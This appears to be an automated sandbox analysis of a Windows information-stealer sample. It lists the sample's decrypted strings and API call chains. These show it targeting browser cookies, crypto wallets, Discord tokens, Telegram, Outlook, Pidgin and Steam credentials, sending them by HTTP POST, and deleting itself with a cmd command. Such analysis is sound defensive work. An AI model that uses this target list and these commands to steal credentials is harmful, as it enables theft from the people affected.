Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: cookies.sqlite
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: formhistory.sqlite
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: places.sqlite
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: plugins
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Local Extension Settings
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Sync Extension Settings
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: IndexedDB
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Opera Stable
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Opera GX Stable
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: CURRENT
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: chrome-extension_
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: _0.indexeddb.leveldb
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Local State
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: profiles.ini
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: chrome
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: opera
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: firefox
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: wallets
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: %08lX%04lX%lu
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: ProductName
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: x32
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: x64
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: DisplayName
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: DisplayVersion
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Network Info:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: - IP: IP?
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: - Country: ISO?
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: System Summary:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: - HWID:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: - OS:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: - Architecture:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: - UserName:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: - Computer Name:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: - Local Time:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: - UTC:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: - Language:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: - Keyboards:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: - Laptop:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: - Running Path:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: - CPU:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: - Threads:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: - Cores:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: - RAM:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: - Display Resolution:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: - GPU:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: User Agents:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Installed Apps:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: All Users:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Current User:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Process List:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: system_info.txt
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: freebl3.dll
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: mozglue.dll
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: msvcp140.dll
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: nss3.dll
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: softokn3.dll
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: vcruntime140.dll
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: \Temp\
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: .exe
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: runas
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: open
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: /c start
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: %DESKTOP%
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: %APPDATA%
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: %LOCALAPPDATA%
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: %USERPROFILE%
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: %DOCUMENTS%
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: %PROGRAMFILES_86%
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: %RECENT%
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: *.lnk
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: files
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: \discord\
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: \Local Storage\leveldb
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: \Telegram Desktop\
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: key_datas
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: D877F783D5D3EF8C*
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: map*
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: A7FDF864FBC10B77*
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: F8806DD0C461824F*
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Telegram
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Tox
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: *.tox
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: *.ini
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Password
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: 00000001
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: 00000002
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: 00000003
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: 00000004
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: \Outlook\accounts.txt
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Pidgin
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: \.purple\
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: accounts.xml
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: dQw4w9WgXcQ
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: token:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Software\Valve\Steam
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: SteamPath
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: \config\
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: ssfn*
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: config.vdf
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: DialogConfig.vdf
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: libraryfolders.vdf
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: loginusers.vdf
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: \Steam\
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: sqlite3.dll
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: done
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: soft
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: \Discord\tokens.txt
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: https
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: POST
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: HTTP/1.1
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: hwid
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: build
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: token
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: file_name
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: file
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: message
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: screenshot.jpg

Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_00406000 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,	1_2_00406000
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_00404B80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,	1_2_00404B80
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_00407690 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	1_2_00407690
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_00424090 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	1_2_00424090
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_00409BE0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	1_2_00409BE0
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_00409B80 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_00409B80
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024E9E47 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	1_2_024E9E47
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024E6267 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,	1_2_024E6267
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024F7260 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,	1_2_024F7260
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_025042F7 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	1_2_025042F7
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024EEFF7 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,	1_2_024EEFF7
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024F7047 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,strtok_s,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,	1_2_024F7047
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024E78F7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	1_2_024E78F7
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024E4DE7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,	1_2_024E4DE7
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024E9DE7 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_024E9DE7

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Unpacked PE file: 0.2.EbXj93v3bO.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Unpacked PE file: 1.2.BB02.tmp.exe.400000.0.unpack

Source: EbXj93v3bO.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\EbXj93v3bO.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:49735 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024F1EA7 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_024F1EA7
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024FCF47 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_024FCF47
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024F3F27 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_024F3F27
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024EDFD7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_024EDFD7
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024E1807 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_024E1807
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024F1827 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_024F1827
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024E1820 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	1_2_024E1820
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024FD8A7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_024FD8A7
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024FE0B7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,	1_2_024FE0B7
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024F5127 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_024F5127
